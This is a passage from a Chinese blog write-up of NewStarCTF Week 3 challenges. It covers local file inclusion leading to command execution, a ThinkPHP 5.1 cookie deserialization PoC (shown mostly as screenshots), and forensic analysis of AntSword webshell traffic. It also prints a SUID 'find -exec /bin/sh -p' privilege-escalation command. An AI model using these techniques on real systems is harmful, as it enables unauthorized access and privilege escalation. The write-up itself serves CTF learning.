<p><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-107.png"></p>
<p>然后我们包含文件monkey.php，使用?file&#x3D;&#x2F;tmp&#x2F;monkey，发现包含成功</p>
<p><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-108.png"></p>
<p>然后通过命令执行来得到flag</p>
<p><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-109.png"><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-110.png"></p>
<h4 id="Maybe-You-Have-To-think-More"><a href="#Maybe-You-Have-To-think-More" class="headerlink" title="Maybe You Have To think More"></a>Maybe You Have To think More</h4><p>根据提示可以猜想是thinkPHP的反序列化，然后随便访问一个文件得到了thinkPHP的具体版本</p>
<p><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-111.png"></p>
<p>先在主页面随便输入一个用户，发现会获取cookie值</p>
<p><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-112.png"></p>
<p>通过解码发现是base64编码的值，而且是序列化的值</p>
<p><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-113.png"></p>
<p>然后我们在网上找了一篇关于thinkPHP5.1序列化的文章，直接拿到poc<br><a target="_blank" rel="noopener" href="https://www.freebuf.com/vuls/263977.html">https://www.freebuf.com/vuls/263977.</a><a target="_blank" rel="noopener" href="https://www.freebuf.com/vuls/263977.html">html</a></p>
<p><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-114.png"><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-115.png"><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-116.png"></p>
<p>flag在环境变量里面</p>
<p><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-117.png"></p>
<h2 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a>MISC</h2><h4 id="qsdz’s-girlfriend-3"><a href="#qsdz’s-girlfriend-3" class="headerlink" title="qsdz’s girlfriend 3"></a>qsdz’s girlfriend 3</h4><p>使用xshell连接，然后在用户目录发现了flag，查看发现了提示</p>
<p><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-118.png"></p>
<p>在blog文件夹里面发现不要让密码相同的提示</p>
<p><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-119.png"></p>
<p>在用户thai的用户目录发现hint，但是打不开，通过查看memo文件可以得到密码进而得到hint</p>
<p><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-120.png"><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-121.png"></p>
<p>SUID，通过百度搜索发现这个可以提升权限，使用find . -exec &#x2F;bin&#x2F;sh -p ; -quit提升权限</p>
<p><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-122.png"></p>
<p>使用ls查看girlfriends目录下的文件</p>
<p><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-123.png"><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-124.png"></p>
<p>然后使用cat查看另外一个文件得到flag</p>
<p><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-125.png"></p>
<h2 id="下面是复现的内容："><a href="#下面是复现的内容：" class="headerlink" title="下面是复现的内容："></a>下面是复现的内容：</h2><p>原文地址：<a target="_blank" rel="noopener" href="https://mochu.blog.csdn.net/article/details/127152796?spm=1001.2014.3001.5502">BUUCTF NewStarCTF 公开赛赛道Week3<br>Writeup</a></p>
<h4 id="Whats-HTTP"><a href="#Whats-HTTP" class="headerlink" title="Whats HTTP"></a>Whats HTTP</h4><p>所有步骤都做了，但是没看文件里面的内容……</p>
<p>先打开流量包，把HTTP对象都导出</p>
<p><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-126.png"></p>
<p>文件按照文件的大小进行排序</p>
<p><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-127.png"></p>
<p>打开sssssercet发现是一段base64编码的内容</p>
<p><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-128.png"><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-129.png"></p>
<h4 id="WebShell！"><a href="#WebShell！" class="headerlink" title="WebShell！"></a><strong>WebShell！</strong></h4><p>这题说flag的形式是flag{webshell密码_黑客获取的用户名_机密文件的内容}</p>
<p>Webshell的密码是最容易获取的（这个我也获取到了，哈哈哈哈）</p>
<p><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-130.png"></p>
<p>接下来似乎好像就得看经验了，师傅说蚁剑的流量要看最长的那串base64解码就可以，并且一般是该参数两位之后的才是正确的命令的base64编码</p>
<p><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-131.png"></p>
<p>这里是看那几个最长的里面，慢慢试出来的，最后得出的命令是whoami以及获取机密文件的命令。</p>
<p><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-132.png"></p>
<p>然后这里的响应包都是gzip的形式</p>
<p><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-133.png"></p>
<p>这里将其改为hex转储</p>
<p><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-134.png"></p>
<p>将gzip格式的数据取出来</p>
<p><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-135.png"></p>
<p>将获取的16进制数据放到winhex中，保存为whoami.txt.gz文件</p>
<p><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-136.png"><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-137.png"></p>
<p>所以得到用户名是www-data，tcp.stream eq 38是获取机密文件的命令，同样的方法</p>
<p><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-138.png"></p>
<p>最后flag为flag{n3wst4r_www-data_Y0UAr3G00D}</p>
<p>得出结论：太难了，我不配作misc……</p>
<p>这一周的解题都在这里了，还是比较废物。好好加油吧！</p>

    </div>

    
    
    

    <footer class="post-footer">
          

<div class="post-copyright">
<ul>
  <li class="post-copyright-author">
      <strong>本文作者： </strong>柷澂
  </li>
  <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="https://monkeyx1.github.io/2022/10/14/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/" title="NewStarCTF 公开赛赛道 WEEK3 WP">https://monkeyx1.github.io/2022/10/14/NewStarCTF-公开赛赛道-WEEK3-WP/</a>
  </li>
  <li class="post-copyright-license">
      <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

          <div class="post-tags">
                    
                      <a href="/" rel="tag"><i class="fa fa-tag"></i> </a>
                    
                      <a href="/" rel="tag"><i class="fa fa-tag"></i> </a>
                    
                      <a href="/" rel="tag"><i class="fa fa-tag"></i> </a>
                    
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2022/10/10/Python%E5%AD%A6%E4%B9%A0-%E4%B8%89/" rel="prev" title="Python学习(三)">
                  <i class="fa fa-chevron-left"></i> Python学习(三)
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2022/10/18/%E4%B8%8D%E5%8C%85%E5%90%AB%E5%AD%97%E6%AF%8D%E5%92%8C%E6%95%B0%E5%AD%97%E7%9A%84webshell/" rel="next" title="不包含字母和数字的webshell">
                  不包含字母和数字的webshell <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 2022 – 
  <span itemprop="copyrightYear">2025</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">柷澂</span>
</div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
      <span>站点总字数：</span>
    <span title="站点总字数">181k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
      <span>站点阅读时长 &asymp;</span>
    <span title="站点阅读时长">2:44</span>
  </span>
</div><div>
  <span id="sitetime"></span>
  <script language=javascript>
      function siteTime(){
          window.setTimeout("siteTime()", 1000);
          var seconds = 1000;
          var minutes = seconds * 60;
          var hours = minutes * 60;
          var days = hours * 24;
          var years = days * 365;
          var today = new Date();
          var todayYear = today.getFullYear();
          var todayMonth = today.getMonth()+1;
          var todayDate = today.getDate();
          var todayHour = today.getHours();
          var todayMinute = today.getMinutes();
          var todaySecond = today.getSeconds();
          /* 
          Date.UTC() -- 返回date对象距世界标准时间(UTC)1970年1月1日午夜之间的毫秒数(时间戳)
          year - 作为date对象的年份，为4位年份值
          month - 0-11之间的整数，做为date对象的月份
          day - 1-31之间的整数，做为date对象的天数
          hours - 0(午夜24点)-23之间的整数，做为date对象的小时数
          minutes - 0-59之间的整数，做为date对象的分钟数
          seconds - 0-59之间的整数，做为date对象的秒数
          microseconds - 0-999之间的整数，做为date对象的毫秒数
      */
          var t1 = Date.UTC(2021,12,23,11,40,00); //北京时间2018-2-13 00:00:00
          var t2 = Date.UTC(todayYear,todayMonth,todayDate,todayHour,todayMinute,todaySecond);
          var diff = t2-t1;
      var diffYears = Math.floor(diff/years);
      var diffDays = Math.floor((diff/days)-diffYears*365);
      var diffHours = Math.floor((diff-(diffYears*365+diffDays)*days)/hours);
      var diffMinutes = Math.floor((diff-(diffYears*365+diffDays)*days-diffHours*hours)/minutes);
      var diffSeconds = Math.floor((diff-(diffYears*365+diffDays)*days-diffHours*hours-diffMinutes*minutes)/seconds);
      document.getElementById("sitetime").innerHTML=" 已运行"+/*diffYears+" 年 "+*/diffDays+" 天 "+diffHours+" 小时 "+diffMinutes+" 分钟 "+diffSeconds+" 秒";
    }
      siteTime();
  </script>
</div>

    </div>
  </footer>

  

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.4.1/search.js" integrity="sha256-1kfA5uHPf65M5cphT2dvymhkuyHPQp5A53EGZOnOLmc=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>







  

  <script class="next-config" data-name="leancloud_visitors" type="application/json">{"enable":true,"app_id":"ccA2VsTMA0zc7SQqWsCEBhP6-gzGzoHsz","app_key":"RzrgPNrOtq5LckltkJZDwE0z","server_url":null,"security":true}</script>
  <script src="/js/third-party/statistics/lean-analytics.js"></script>



<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/miku.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true},"log":false});</script></body>
</html>
